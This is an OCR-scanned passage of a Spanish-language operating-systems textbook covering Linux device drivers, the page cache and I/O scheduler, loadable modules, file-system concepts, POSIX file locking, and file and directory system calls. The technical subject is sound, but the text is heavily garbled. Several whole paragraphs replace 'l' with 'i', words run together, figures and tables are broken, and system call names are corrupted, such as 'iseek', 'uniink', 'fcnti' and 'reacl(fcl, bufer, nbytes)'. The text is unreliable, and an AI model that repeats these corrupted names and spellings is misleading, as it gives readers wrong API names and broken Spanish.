varias funciones más. Cuando se realiza una operación en un archivo especial de caracteres, el siste¬ 
ma indexa en la tabla de hash de dispositivos de caracteres para seleccionar la estructura apropiada, 
y después llama a la función correspondiente para realizar el trabajo. Así, cada una de las operacio¬ 
nes de archivos contiene un apuntador a una función contenida en el driver correspondiente. 
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Figura 10-21. A Igunas de las operaciones de archivos que se aceptan para los 
dispositivos de caracteres comunes. 

Cada driver se divide en dos partes: ambas forman parte del kernel de Linux y se ejecutan en 
modo de kernel. La mitad superior se ejecuta en el contexto del que hace la llamada y sirve como 
interfaz para el resto de Linux. La mitad inferior se ejecuta en el contexto del kernel e interactúa 
con el dispositivo. Los drivers pueden hacer llamadas a los procedimientos del kernel para asignar 
memoria, administrar el temporizador, controlar el DM A y otras cosas. El conjunto defunciones del 
kernel que se pueden llamar se define en un documento conocido como Interfaz dedriver-kernel. 
La escritura de drivers de dispositivos para Linux se trata con detalle en (Egan y Teixeira, 1992; Ru- 
bini y colaboradores, 2005). 

El sistema de E/S se divide en dos componentes principales: el manejo de los archivos espe¬ 
ciales de bloques y el de los archivos especiales de caracteres. A hora analizaremos cada uno de es¬ 
tos componentes en turno. 

El objetivo de la parte del sistema que realiza operaciones de E/S en archivos especiales de blo¬ 
ques (por ejemplo, los discos) es minimizar el número de transferencias que se deben realizar. 
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Para lograr este objetivo, los sistemas Linux tienen una caché entre los drivers de disco y el siste¬ 
ma de archivos, como se muestra en la figura 10-22. Antes del kernel 2.2, Linux mantenía cachés 
de página y de búfer completamente separadas, por lo que un archivo que residía en un bloque de 
disco se podía colocaren ambas cachés. Las versiones más recientes de Linux tienen una caché uni¬ 
ficada. U n nivel de bloques genérico mantiene unidos estos componentes, realiza las traducciones 
necesarias entre sectores de disco, bloques, búferes y páginas de datos, y permite realizar operacio¬ 
nes en ellos. 

La caché es una tabla en el kernel para contener miles de los bloques de uso más reciente. 
Cuando se requiere un bloque del disco para cualquier propósito (nodo-i, directorio o datos), pri¬ 
mero se realiza una comprobación para ver si está en la caché. De ser así, se toma de ahí y se evi¬ 
ta un acceso al disco, con lo cual se obtienen grandes mejoras en el rendimiento del sistema. 
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Figura 10-22. El sistema de E/S de Linux muestra un sistema de archivos con detalle. 


Si el bloque no está en la caché de páginas, se lee del disco y se coloca en la caché, y de ahí se 
copia hacia donde se necesita. Como la caché de páginas sólo tiene espacio para un número fijo de 
bloques, se invoca el algoritmo de reemplazo de páginas que describimos en la sección anterior. 

La caché de páginas funciona para escrituras y lecturas. Cuando un programa escribe en un blo¬ 
que, éste va a la caché y no al disco. El demonio pdflush vacía el bloque al disco, en caso deque la 
caché aumente por encima de un valor especificado. A demás, para evitar que los bloques se queden 
demasiado tiempo en la caché antes de escribirlos en el disco, todos los bloques sucios se escriben 
en el disco cada 30 segundos. 

Para poder minimizar la latencia de los movimientos repetidos de la cabeza del disco, Linux se 
basa en un planificador deE/S cuyo propósito es reordenar o agrupar las peticiones de lectura/es¬ 
critura para los dispositivos de bloques. Hay muchas variantes del planificador, optimizadas para 
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distintos tipos de cargas de trabajo. Ei pianificador básico de Linux se basa en ei planificador del 
elevador delinus. Las operaciones dei pianificador dei eievador se pueden sintetizar de ia siguien¬ 
te manera: ias operaciones de disco se ordenan en una iista dobiemente eniazada, ia cuai se ordena 
con base en i a dirección dei sector de i a petición de disco. Las nuevas peticiones se insertan en es¬ 
ta iista en forma ordenada. Esto evita ios movimientos repetidos y costosos de ia cabeza dei disco. 
Después, ia iista de peticiones se combina de manera que ias operaciones adyacentes se emitan a 
través de una soia petición de disco. Ei programador dei eievador básico puede producir inanición. 
Por io tanto, ia versión revisada dei programador de disco de Linux inciuye dos iistas adicionaies y 
mantiene en orden ias operaciones de iectura o escritura, con base en sus tiempos iímite. Los tiem¬ 
pos iímite predeterminados son de 0.5 segundos para ias peticiones de iectura y de 5 segundos pa¬ 
ra ias peticiones de escritura. Si un tiempo iímite definido por ei sistema para ia operación de 
escritura más antigua está a punto de expirar, se atenderá esa petición de escritura antes que cuai- 
quiera de ias peticiones en ia iista dobiemente eniazada principai. 

Además de ios archivos de disco reguiares hay archivos especiaies de bioques, también cono¬ 
cidos como bloques de disco crudos. Estos archivos permiten que ios programas accedan ai disco 
mediante ei uso de números de bioque absoiutos, sin importar ei sistema de archivos. Se utiiizan 
con más frecuencia para cosas como ia paginación y ei mantenimiento dei sistema. 

La interacción con ios dispositivos de caracteres es simpie. Como ios dispositivos de caracte¬ 
res producen o consumen fiujos de caracteres (o bytes de datos), no tiene mucho sentido ia acepta¬ 
ción de acceso aieatorio. Una excepción es ei uso de disciplinas de línea. Se puede asociar una 
discipiina de iínea con un dispositivo de terminai, io cuai se representa mediante ia estructura tty_ 
struct y representa un intérprete para ios datos que se intercambian con ei dispositivo de terminai. 
Por ejempio, se puede reaiizar ia edición de iíneas iocai (es decir, se pueden eiiminar ias iíneas y 
ios caracteres borrados), ios retornos de carro se pueden asignar a ios avances de iínea, y se puede 
compietar cuaiquier otro procesamiento especiai. No obstante, si un proceso interactúa en cada ca¬ 
rácter, puede poner ia iínea en modo crudo, en cuyo caso se ignorará ia discipiina de iínea. No to¬ 
dos ios dispositivos tienen discipiinas de iínea. 

La saiida funciona de manera simiiar: se expanden ios tabuiadores a espacios, se convierten ios 
avances de iínea en retornos de carro -i- avances de iínea, se agregan caracteres de reiieno después 
de ios retornos de carro en terminaies mecánicas ientas, etcétera. Ai iguai que ia entrada, ia saiida 
puede pasar por ia discipiina de iínea (modo cocido) o ignorada (modo crudo). Ei modo crudo es 
especiaimente útii cuando se envían datos binarios a otras computadoras a través de una iínea se- 
riai, y para iasGUIs. Aquí no se desean conversiones. 

La interacción con ios dispositivos de red es aigo distinta. A unque ios dispositivos de red tam¬ 
bién producen/consumen fiujos de caracteres, su naturaieza asincrona ios hace menos adecuados 
para integrarse con faciiidad bajo ia misma interfaz que otros dispositivos de caracteres. Ei driver 
dei dispositivo de red produce paquetes que consisten en varios bytes de datos, junto con encabe¬ 
zados de red. Después, estos paquetes se enrutan a través de una serie de drivers de protocoios de 
red, y por úitimo se pasan a ia apiicación en espacio de usuario. La estructura de búfer de socket sk- 
buff es una estructura de datos ciave, ia cuai se utiiiza para representar porciones deia memoria iie- 
nas con ios datos dei paquete. Los datos en un búfer skbuff no siempre empiezan en ia parte iniciai 
dei búfer. A medida que varios protocoios en ia piia de red ios procesan, se pueden eiiminar o agre¬ 
gar encabezados de protocoio. Los procesos de usuario interactúan con ios dispositivos de red a tra- 
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vés de sockets, que en Linux brinda ia API de sockets original de BSD. Los drivers de los proto¬ 
colos se pueden ignorar y se permite el acceso directo al dispositivo de red subyacente por medio 
de raw_sockets. Sólo los superusuarios pueden crear sockets crudos. 

10.5.5 Los módulos en Linux 

Durante décadas, los drivers de dispositivos en UNIX se han vinculado en forma estática en el ker- 
nel, por lo que todos estaban presentasen memoria cada vez que se iniciaba el sistema. Dado el en¬ 
torno en el cual creció UNIX, la mayoría de las minicomputadoras departamentales y después las 
estaciones de trabajo de alto rendimiento, con sus pequeños conjuntos de dispositivos de E/S que 
nunca cambiaban, este esquema funcionaba bien. Básicamente, un centro de cómputo construía un 
kernel que tuviera drivers para los dispositivos de E/S y eso era todo. Si el siguiente año el centro 
compraba un nuevo disco, volvía a vincular el kernel. No había ningún problema. 

Con la llegada de Linux a la plataforma de la PC, todo eso cambió de manera repentina. El nú¬ 
mero de dispositivos de E/S disponibles en la PC es mucho mayor que en cualquier minicomputa¬ 
dora. A demás, aunque todos los usuarios de Linux tienen (o pueden obtener con facilidad) el código 
fuente completo, tal vez la gran mayoría hubiera considerado que era difícil agregar un driver, ac¬ 
tualizar todas las estructuras de datos relacionadas con el driver del dispositivo, volver a vincular el 
kernel y después instalarlo como el sistema con capacidad de inicio (sin mencionar tener que lidiar 
con la desgracia de construir un kernel que no inicia). 

Linux resolvió este problema con el concepto de los móduloscargables. Éstos son piezas de 
código que se pueden cargaren el kernel mientras el sistema se ejecuta. Los módulos más comunes 
son los drivers de dispositivos de caracteres o de bloques, pero también pueden ser sistemas de ar¬ 
chivos completos, protocolos de red, herramientas de monitoreo del rendimiento o cualquier otra 
cosa que se desee. 

Al cargar un módulo, deben ocurrir varias cosas. En primer lugar, el módulo se tiene que reubi¬ 
car al instante, durante la carga. En segundo lugar, el sistema tiene que comprobar si están disponi¬ 
bles los recursos que necesita el driver (por ejemplo, los niveles de peticiones de interrupciones) y, 
de ser así, los marca como que están en uso. En tercer lugar, se deben establecer todos los vectores de 
interrupción necesarios. En cuarto lugar, se tiene que actualizar la tabla de cambio de drivers apro¬ 
piada para manejar el nuevo tipo de dispositivo mayor. Por último, se permite la ejecución del dri¬ 
ver para realizar toda la inicialización específica del dispositivo que se requiera. Una vez que se 
completan todos estos pasos, el driver está completamente instalado, de igual forma que cualquier 
driver estático. A hora, otros sistemas modernos de U NIX también admiten módulos cargables. 


10.6 EL SISTEMA DE ARCHIVOS DE LINUX 

La parte más visible de cualquier sistema operativo, incluyendo Linux, es el sistema de archivos. 
En las siguientes secciones examinaremos las ideas básicas detrás del sistema de archivos de Linux, 
las llamadas al sistema y la forma en que se implementa este sistema. Algunas de estas ideas se 
derivan de M ULTICS, y muchas de ellas se han copiado en M S-DOS, Windows y otros sistemas. 
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pero otras son únicas para los sistemas basados en UNIX. El diseño de Linux es en especial intere¬ 
sante, debido a que ilustra con claridad el principio de Lo pequeño es hermoso. A pesar de contar 
con un mecanismo mínimo y un número muy limitado de llamadas al sistema, Linux ofrece un po¬ 
deroso y elegante sistema de archivos. 


10.6.1 Conceptos fundamentales 

El sistema de archivos inicial de Linux fue M INIX 1. Sin embargo, debido al hecho de que limita¬ 
ba los nombres de archivos a 14 caracteres (para poder ser compatible con la versión 7 de UNIX) 
y a que el tamaño máximo de sus archivos era de 64 M B (lo cual era una exageración en los discos 
duros de 10 M B de su época), había un interés en mejores sistemas de archivos casi desde el inicio 
del desarrollo de Linux, que empezó aproximadamente 5 años después de liberar el M INIX 1. La 
primera mejora fue el sistema de archivos ext, que permitía nombres de archivos de 255 caracteres 
y archivos de2 GB, pero era más lento que el sistema de archivos M INIX 1, por lo que la búsque¬ 
da continuó durante un tiempo. En cierto momento se inventó el sistema de archivos ext2, con nom¬ 
bres de archivos largos, archivos extensos y un mejor rendimiento, y desde entonces se convirtió en 
el sistema de archivos principal. No obstante, Linux admite varias docenas de sistemas de archivos 
mediante el nivel Sistema de archivos virtual (VES) (que analizaremos en la siguiente sección). Al 
vincular Linux, se ofrece una opción en cuanto a los sistemas de archivos que se van a incluir en el 
kernel. Otros se pueden cargar en forma dinámica como módulos durante la ejecución, si es nece¬ 
sario. 

Un archivo en Linux es una secuencia de 0 o más bytes que contienen información arbitraria. 
No se hace distinción entre los archivos ASCII, los archivos binarios o cualquier otro tipo de archi¬ 
vo. El significado de los bits en un archivo depende por completo de su propietario. Al sistema no 
le importa. Los nombres de los archivos se limitan a 255 caracteres, y se permiten todos los carac¬ 
teres ASCII excepto NUL en los nombres de archivos, por lo que un nombre de archivo que con¬ 
sista en tres retornos de carro es válido (pero no es muy conveniente). 

Por convención, muchos programas esperan que los nombres de los archivos consistan en un 
nombre base y una extensión, separados por un punto (que cuenta como carácter). Así, prog.c es 
por lo general un programa deC, prog.f90 es por lo general un programa de FORTRAN 90 y pro- 
g.o es por lo general un archivo de código objeto (producido por el compilador). Estas convencio¬ 
nes no las implementa el sistema operativo, sino que algunos compiladores y otros programas las 
esperan. Las extensiones pueden tener cualquier longitud, y los archivos pueden tener varias ex¬ 
tensiones, como en prog.java.gz, que probablemente sea un programa de java comprimido con 
gzip. 

Los archivos se pueden agrupar en directorios por conveniencia. Los directorios se almacenan 
como archivos, y hasta cierto grado se pueden tratar como ellos. Los directorios pueden contener 
subdirectorios, lo que nos lleva a un sistema de archivos jerárquico. El directorio raíz se llama / y 
por lo general contiene varios subdirectorios. El carácter / también se utiliza para separar nombres 
de directorios, por lo que el nombre /usr/ast/x denota el archivo x ubicado en el directorio ast, el 
cual se encuentra en el directorio /usr. Algunos de los directorios principales cerca de la parte su¬ 
perior del árbol se muestran en la figura 10-23. 
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Directorio 

Contenido 

bin 

Programas binarios (ejecutabies) 

dev 

Archivos especiaies para dispositivos de E/S 

etc 

Archivos misceiáneos dei sistema 

lib 

Bibiiotecas 

usr 

Directorios de usuario 


Figura 10-23. Algunos directorios importantes que se encuentran en ia mayoría de ios 
sistemas Linux. 


Hay dos formas de especificar los nombres de archivos en Linux, tanto para el shell como al 
abrir un archivo desde el interior de un programa. La primera forma es mediante el uso de una ru¬ 
ta absoluta, donde se indica cómo llegar al archivo desde el directorio raíz. Un ejemplo de una 
ruta absoluta es/usr/ast/libros/mos3/cap-10. Esto indica al sistema que debe buscar en el directorio 
raíz un directorio llamado usr, después debe buscar ahí otro directorio llamado ast. A su vez, este 
directorio contiene un directorio llamado libros, el cual contiene el directorio mos3, que contiene el 
archivo cap-10. 

Los nombres de rutas absol utas son a menudo largóse inconvenientes. Foresta razón, Linux per¬ 
mite a los usuarios y procesos designar el directorio actual en el que se encuentran trabajando como 
el directorio de trabajo. Los nombres de rutas también se pueden especificar en forma relativa al di¬ 
rectorio de trabajo. U n nombre de ruta que se especifica de esta manera es una ruta relativa. Por ejem¬ 
plo, si /usr/ast/libros/mos3 es el directorio de trabajo, entonces el comando del shell 

cp cap-10 respaldo-i 0 

tiene exactamente el mismo efecto que el siguiente comando más largo: 

cp /usr/ast/libros/mos3/cap-10 /usr/ast/libros/mos3/respaldo-10 

Con frecuencia ocurre que un usuario necesita hacer referencia a un archivo que pertenece a 
otro usuario, o que por lo menos se encuentra en alguna otra parte del archivo de directorios. Por 
ejemplo, si dos usuarios comparten un archivo, éste se encontrará en un directorio que pertenezca 
a uno de ellos, por lo que el otro usuario tendrá que utilizar un nombre de ruta absoluta para refe¬ 
rirse al archivo (o tendrá que cambiar el directorio de trabajo). Si esta ruta es demasiado larga, pue¬ 
de ser irritante tener que escribirla varias veces. Linux ofrece una solución para este problema, al 
permitir que los usuarios creen una nueva entrada en el directorio que apunte a un archivo existen¬ 
te. A dicha entrada se le conoce como vínculo. 

Como ejemplo, considere la situación de la figura 10-24(a). Fred y Lisa trabajan juntos en un 
proyecto, y cada quien necesita acceso a los archivos del otro. Si Fred tiene /usr/fred como su di¬ 
rectorio de trabajo, puede hacer referencia al archivo x en el directorio de Lisa como /usr/lisa/x. De 
manera alternativa, Fred puede crear una nueva entrada en su directorio, como se muestra en la fi¬ 
gura 10-24(b), después de lo cual puede utilizar x para indicar/usr/lisa/x. 

En el ejemplo que acabamos de ver, sugerimos que antes de la vinculación la única forma de 
que Fred hiciera referencia al archivo x de Lisa era mediante su ruta absoluta. En realidad, esto no 
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/ / 




(a) 


(b) 


Figura 10-24. (a) Antes de la vinculación, (b) Después de la vinculación. 


es completamente cierto. Cuando se crea un directorio se crean en él, de manera automática, las en¬ 
tradas . y ... La primera entrada se refiere al directorio de trabajo mismo. La segunda se refiere al 
padre de ese directorio: es decir, el directorio en el que se lista el directorio de trabajo. Así, desde 
el directorio/usr/fred se puede utilizar otra ruta al archivo x de Lisa: ../lisa/x. 

Además délos archivos regulares, Linux también acepta los archivos especiales de caracteres y 
los archivos especiales de bloques. L os archivos especiales de caracteres se utilizan para modelar los 
dispositivos de E/S en serie, como los teclados y las impresoras. Al abrir y leer de/dev/tty se lee del 
teclado: al abrir y escribirán /dev/lp se escribe en la impresora. Los archivos especiales de bloques, 
que con frecuencia tienen nombres como /dev/hdl, se pueden utilizar para leer y escribir en particio¬ 
nes de disco crudas sin importar el sistema de archivos. Así, una búsqueda en el byte k seguida de 
una lectura empezará a leer desde el k-ésimo byte en la partición correspondiente, ignorando por 
completo al nodo-i y la estructura de archivos. Por ejemplo, los dispositivos de bloques crudos se uti¬ 
lizan para paginación e intercambio en los programas que establecen sistemas de archivos (por ejem¬ 
plo, mkfs), y en programas que corrigen sistemas de archivos enfermos (por ejemplo, fsck). 

M uchas computadoras tienen dos o más discos. Por ejemplo, en las mainframes en los bancos 
es con frecuencia muy necesario tener 100 o más discos en una sola máquina, para poder contener 
las enormes bases de datos requeridas. Incluso las computadoras personales tienen normalmente al 
menos dos discos: un disco duro y una unidad de disco óptico (como el DVD). Cuando hay varias 
unidades de disco, surge la cuestión sobre cómo manejarlos. 

U na solución es colocar un sistema de archivos auto contenido en cada unidad y sólo mantener¬ 
los separados. Por ejemplo, considérela situación que se muestra en la figura 10-25(a).Aquí tenemos 
un disco duro al que llamaremos C:, y un DVD al que llamaremos D:. Cada uno tiene su propio di¬ 
rectorio raíz y sus propios archivos. Con esta solución, el usuario tiene que especificar tanto el dispo¬ 
sitivo como el archivo cuando se necesita algo que no sea el valor predeterminado. Por ejemplo, para 
copiar el archivo x en el directorio d (suponiendo que C: sea el predeterminado), hay que escribir 


cp D:/x /a/d/x 
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Este es el método que utilizan varios sistemas, incluyendo M S-DOS, Windows 98 y VM S. 


Disco duro DVD Disco duro 



Figura 10-25. (a) Sistemas de archivos separados, (b) Después de montarlos. 


La solución de Linux es permitir montar un disco en el árbol de archivos de otro disco. En nues¬ 
tro ejemplo, podríamos montar el DVD en el directorio Ib, con lo cual se produce el sistema de ar¬ 
chivos de la figura 10-25(b). Ahora el usuario ve un solo árbol de archivos, y ya no se tiene que 
preocupar sobre cuál archivo reside en qué dispositivo. El comando de copia anterior se convierte 
ahora en 

cp /b/x /a/d/x 

exactamente como hubiera sido si todo hubiera estado en el disco duro desde el principio. 

Otra propiedad interesante del sistema de archivos de Linux es el bloqueo. En algunas aplica¬ 
ciones, dos o más procesos pueden estar usando el mismo archivo al mismo tiempo, lo cual puede 
producir condiciones de competencia. Una solución es programar la aplicación con regiones críti¬ 
cas. No obstante, si los procesos pertenecen a usuarios independientes que ni siquiera se conocen 
entre sí, por lo general este tipo de coordinación es inconveniente. 

Por ejemplo, considere una base de datos que consiste en muchos archivos en uno o más direc¬ 
torios, a los cuales acceden usuarios que no están relacionados. Sin duda es posible asociar un se¬ 
máforo con cada directorio o archivo y lograr una exclusión mutua, al hacer que los procesos 
realicen una operación down en el semáforo apropiado antes de acceder a los datos. Sin embargo, la 
desventaja es que luego todo un directorio o archivo estaría inaccesible, aun cuando tal vez sólo se 
requiera un registro. 

Foresta razón, POSIX ofrece un mecanismo flexible y detallado para que los procesos bloqueen 
desde un solo byte hasta todo un archivo en una operación indivisible. El mecanismo de bloqueo re¬ 
quiere que el proceso que hace la llamada especifique el archivo a bloquear, el byte inicial y el nú¬ 
mero de bytes. Si la operación tiene éxito, el sistema crea una entrada en la tabla para indicar que 
los bytes en cuestión (por ejemplo, el registro de una base de datos) están bloqueados. 
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Hay dos tipos de bloqueos: bloqueos compartidos y bloqueos exclusivos. Si una porción de 
un archivo ya contiene un bloqueo compartido, se permite un segundo intento de colocar un blo¬ 
queo compartido sobre este archivo, pero un intento de poner un bloqueo exclusivo sobre él fraca¬ 
sará. Si una porción de un archivo contiene un bloqueo exclusivo, todos los intentos de bloquear 
cualquier parte de esta porción fracasarán hasta que se libere el bloqueo. Para poder colocar un blo¬ 
queo con éxito, todos los bytes en la región que se desea bloquear deben estar disponibles. 

Al colocar un bloqueo, un proceso debe especificar si se desea bloquear o no en caso de que 
no se pueda colocar el bloqueo. Si opta por bloquearse, cuando se haya eliminado el bloqueo exis¬ 
tente, el proceso se desbloqueará y se colocará el bloqueo en el archivo. Si el proceso opta por no 
bloquearse cuando no pueda colocar un bloqueo en el archivo, la llamada al sistema regresará de 
inmediato y el código de estado indicarás! el bloqueo del archivo tuvo éxito o no. Si fracasó, el pro¬ 
ceso que hizo la llamada tiene que decidir qué es lo que debe hacer a continuación (por ejemplo, 
esperar e intentar de nuevo). 

Las regiones bloqueadas se pueden traslapar. En la figura 10-26(a) podemos ver que el proce¬ 
so A ha colocado un bloqueo compartido en los bytes 4 a 7 de cierto archivo. Después, el proceso 
B coloca un bloqueo compartido en los bytes 6 a 9, como se muestra en la figura 10-26(b). Por úl¬ 
timo, C bloquea los bytes 2 a 11. M ientras estos bloqueos sean compartidos, pueden co-existir. 


Bloqueo 
compartido 
del proceso A 



Bloqueo compartido de A 


(b) 


0 1 



BStH 

1 

10 

11 

12 

13 

14 

15 


Bloqueo compartido de B 



Bloqueo compartido de C 


Figura 10-26. (a) U n archivo con un bloqueo, (b) Adición de un segundo bloqueo, 
(c) Un tercer bloqueo. 


Ahora considere lo que ocurre si un proceso trata de adquirir un bloqueo exclusivo sobre el by- 
te 9 del archivo de la figura 10-26(c), donde el proceso solicita bloquearse en caso de que fracase 
el bloqueo de ese byte. Como hay dos bloqueos anteriores sobre este bloque, el proceso que hizo la 
llamada se bloqueará y permanecerá en ese estado hasta que B y C liberen sus bloqueos. 
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10.6.2 L lamadas al sistema de archivos en L inux 

M uchas llamadas al sistema están relacionadas con los archivos y el sistema de archivos. Primero 
analizaremos las llamadas al sistema que operan sobre archivos individuales. M ás adelante exami¬ 
naremos las llamadas al sistema que involucran directorios o el sistema de archivo como un todo. 
Para crear un nuevo archivo, se puede utilizar la llamada creat (cuando se le preguntó a Ken 
Thompson qué hubiera hecho de distinta manera si tuviera la oportunidad de reinventar UNIX, res¬ 
pondió que utilizaría cneate en vez de creat). Los parámetros proporcionan el nombre del archivo 
y el modo de protección. Así, 

fd = creat(“abc”, modo); 

crea un archivo llamado abe, cuyos bits de protección se obtienen de modo. Estos bits determinan 
cuáles usuarios pueden acceder al archivo y de qué forma. M ás adelante los analizaremos. 

La llamada a creat no sólo crea un nuevo archivo, sino que también lo abre en modo de escri¬ 
tura. Para permitir que las siguientes llamadas al sistema accedan al archivo, una llamada exitosa a 
creat devuelve como resultado un pequeño entero no negativo conocido como descriptor de archivo, 
fd en el ejemplo anterior. Si se llama a creat en un archivo existente, la longitud de ese archivo se 
trunca a 0 y se descarta su contenido. También se pueden crear archivos mediante la llamada a open 
con los argumentos apropiados. 

Ahora sigamos analizando las principales llamadas al sistema de archivos, que se listan en la 
figura 10-27. Para leer o escribir en un archivo existente, primero se debe abrir mediante open. Es¬ 
ta llamada especifica el nombre de archivo que se va a abrir y cómo se debe abrir: para lectura, es¬ 
critura o ambas. También se pueden especificar varias opciones. Al igual que creat, la llamada a 
open devuelve un descriptor de archivo que se puede utilizar para leer o escribir. Después el archi¬ 
vo se puede cerrar mediante cióse, que hace que el descriptor del archivo se pueda reutilizar en una 
llamada subsiguiente a creat u open. Estas dos llamadas siempre devuelven el descriptor de archi¬ 
vo de menor numeración que no se encuentre en uso actualmente. 

Cuando un programa se empieza a ejecutar de la manera estándar, los descriptores 0,1 y 2 ya 
están abiertos para la entrada estándar, la salida estándar y el error estándar, respectivamente. De 
esta forma, un filtro como el programa sort puede leer su entrada del descriptor de archivo 0 y es¬ 
cribir su salida en el descriptor de archivo 1, sin tener que saber qué archivos son. Este mecanismo 
funciona debido a que el shell se encarga de que estos valores se refieran a los archivos correctos 
(redirigidos) antes de que se inicie el programa. 

Las llamadas que se utilizan con más frecuencia son sin duda ready write. Cada una tiene tres 
parámetros: un descriptor de archivo (que indica en qué archivo abierto se debe leer o escribir), una 
dirección de búfer (que indica en dónde se deben poner los datos, o de dónde se deben obtener) y 
una cuenta (que indica cuántos bytes se deben transferir). Eso es todo lo que hay. Es un diseño muy 
simple. Una llamada típica es 

n = reacl(fcl, bufer, nbytes); 

Aunque casi todos los programas leen y escriben archivos en forma secuencial, algunos progra¬ 
mas necesitan tener la capacidad de acceder a cualquier parte de un archivo al azar. Cada archivo 
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Llamada al sistema 

Descripción 

da = creat(nombre, modo) 

Una forma de crear un nuevo archivo 

fd = open{arch¡vo, como, ...) 

Abre un archivo para iectura, escritura o ambas 

s = close(fd) 

Cierra un archivo abierto 

n = read(fd, bufer, nbytes) 

Lee datos de un archivo y ios coioca en un búfer 

n = write(fd, bufer, nbytes) 

Escribe datos de un búfer a un archivo 

posición = iseek(fd, despi, de donde) 

Desplaza el apuntador del archivo 

s = stat(nombre, &buf) 

Obtiene la información de estado de un archivo 

s = fstat(fd, &buf) 

Obtiene la información de estado de un archivo 

s = pipe(&fd[0]) 

Crea una tubería 

s = fcnti{fd, cmd, ...) 

Bloqueo de archivos y otras operaciones 


Figura 10-27. Algunas llamadas al sistema relacionadas con archivos. El có¬ 
digo de retorno s es -1 si ocurrió un error; da es un descriptor de archivo y 
posición es un desplazamiento. Los parámetros se explican por sí mismos. 

tiene asociado un apuntador que indica ia posición actuai en ei archivo. Ai ieer (o escribir) en forma 
secuenciai, por io generai apunta ai siguiente byte que se debe ieer (escribir). Por ejempio, si ei 
apuntador está en 4096, después de ieer 1024 bytes se despiezará de manera automática a ia posi¬ 
ción 5120 después de una iiamada ai sistema read exitosa. La iiamada a iseek cambia ei vaior dei 
apuntador de posición, por io queias iiamadas subsiguientes a read o write pueden empezar en cuai- 
quier parte dei archivo, o inciuso más aiiá de su finai. Se ie iiama iseek para evitar confundida con 
seek, una iiamada que ahora es obsoieta pero antes se utiiizaba en ias computadoras de 16 bits para 
reai izar búsquedas. 

Lseek tiene tres parámetros: ei primero es ei descriptor para ei archivo: ei segundo es una po¬ 
sición de archivo: ei tercero indica si ia posición dei archivo es reiativa a su inicio, a ia posición ac¬ 
tuai o a su finai. Ei vaior devueito por iseek es ia posición absoiuta en ei archivo después de 
modificar ei apuntador ai archivo. Es un poco irónico que iseek sea ia única iiamada ai sistema 
de archivos que nunca produce una búsqueda actuai en ei disco, ya que todo io que hace es actua- 
iizar ia posición actuai en ei archivo, que es un número en ia memoria. 

Para cada archivo, Linux iieva ei registro dei modo dei archivo (reguiar, directorio, archivo es- 
peciai), su tamaño, fecha de úitima modificación y demás información. Los programas pueden pe¬ 
dir ver esta información a través de ia iiamada ai sistema stat. Ei primer parámetro es ei nombre 
dei archivo. Ei segundo es un apuntador a una estructura donde se va a coiocar ia información so- 
iicitada. En ia figura 10-28 se muestran ios campos en ia estructura. La iiamada a fstat es iguai que 
stat, excepto que opera con un archivo abierto (cuyo nombre tai vez no se conozca) en vez de ha¬ 
ced o con un nombre de ruta. 

La iiamada ai sistema pipe se utiiiza para crear tuberías. Crea un tipo de seudoarchivo, que co- 
ioca en un búfer ios datos entre ios componentes de ia tubería y devueive descriptores de archivo 
para ieer y escribir en ei búfer. En una tubería tai como 


sort <ent | head -30 
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Dispositivo en ei que está ei archivo 

Número de nodo-i (cuái archivo en ei dispositivo) 

Modo dei archivo (inciuye información de protección) 

Número de víncuios al archivo 

Identidad del propietario del archivo 

Grupo al que pertenece el archivo 

Tamaño del archivo (en bytes) 

Hora de creación 

Hora del último acceso 

Hora de la última modificación 


Figura 10-28. Los campos devueltos por la llamada al sistema stat. 


el descriptor de archivo 1 (salida estándar) en el proceso que ejecuta sort se establece (mediante el 
Shell) para escribir en la tubería, y el descriptor de archivo 0 (entrada estándar) en el proceso que 
ejecuta head se establece para leer de la tubería. De esta forma, sort simplemente lee del descriptor 
de archivo 0 (que se estableció en el archivo ent) y escribe en el descriptor 1 (la tubería) sin estar 
consciente siquiera de que estos descriptores se redirigieron. Si no se hubieran redirigido, sort lee¬ 
ría de manera automática del teclado y escribiría en la pantalla (los dispositivos predeterminados). 
De manera similar, cuando head lee del descriptor de archivo 0, está leyendo los datos que sort co¬ 
locó en el búfer de la tubería sin saber siquiera que se está utilizando una. Éste es un claro ejemplo 
de cómo un concepto simple (redirección) con una implementación simple (descriptores de archi¬ 
vo 0 y 1) puede producir una poderosa herramienta (conectar programas en formas arbitrarias sin 
tener que modificarlos para nada). 

La última llamada al sistema en la figura 10-27 es fcnti. Se utiliza para bloquear y desbloquear 
archivos, aplicar bloqueos compartidos o exclusivos y realizar unas cuantas operaciones más que 
son específicas para archivos. 

Ahora veamos algunas llamadas al sistema que se relacionan más con los directorios o con 
el sistema de archivos como un todo, en vez de un solo archivo específico. A Igunas de las llamadas 
comunes se listan en la figura 10-29. Los directorios se crean y se destruyen mediante el uso de 
mkdir y rmdir, respectivamente. Un directorio se puede eliminar sólo si está vacío. 

Como vimos en la figura 10-24, al crear un vínculo a un archivo se crea una nueva entrada en 
el directorio que apunta a un archivo existente. La llamada al sistema link crea el vínculo. Los pa¬ 
rámetros especifican los nombres original y nuevo, respectivamente. Las entradas del directorio se 
eliminan mediante uniink. Cuando se elimina el último vínculo a un archivo, la primera llamada a 
uniink hace que desaparezca. Para un archivo que nunca se ha vinculado, la primer llamada a un¬ 
iink hace que desaparezca. 

El directorio de trabajo se cambia mediante la llamada al sistema chdir. Esto tiene el efecto de 
cambiar la interpretación de los nombres de rutas relativas. 

Las últimas cuatro llamadas de la figura 10-29 son para leer directorios. Se pueden abrir, ce¬ 
rrar y leer, en forma similar a los archivos ordinarios. Cada llamada a readdir devuelve exactamen¬ 
te una entrada del directorio en un formato fijo. No hay forma de que los usuarios escriban en un 
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Llamada al sistema 

Descripción 

s = mkdirjruta, modo) 

Crea un nuevo directorio 

s = rmdir(ruta) 

Eiimina un directorio 

s = linkjrutaant, rutanueva) 

Crea un víncuio a un archivo existente 

s = unlink(ruta) 

Eiimina ei víncuio de un archivo 

s = chdirjruta) 

Cambia ei directorio de trabajo 

dir = opendir(ruta) 

Abre un directorio para ieerio 

s = closedir(dir) 

Cierra un directorio 

dirent = readdir(dir) 

Lee una entrada dei directorio 

rewinddirjdir) 

Rebobina un directorio para poder voiverlo a ieer 


Figura 10-29. Algunas llamadas al sistema relacionadas con directorios. El código de 
retorno s es -1 si ocurrió un error; dir identifica un flujo de directorios, y dirent es una 
entrada del directorio. Los parámetros se explican por sí solos. 


directorio (para poder mantener ia integridad dei sistema de archivos). Se pueden agregar archivos 
a un directorio mediante creat o link y se pueden eiiminar mediante uniink. Tampoco hay forma 
de buscar un archivo específico en un directorio, pero rewinddir permite voiver a ieer un directo¬ 
rio abierto desde ei principio. 

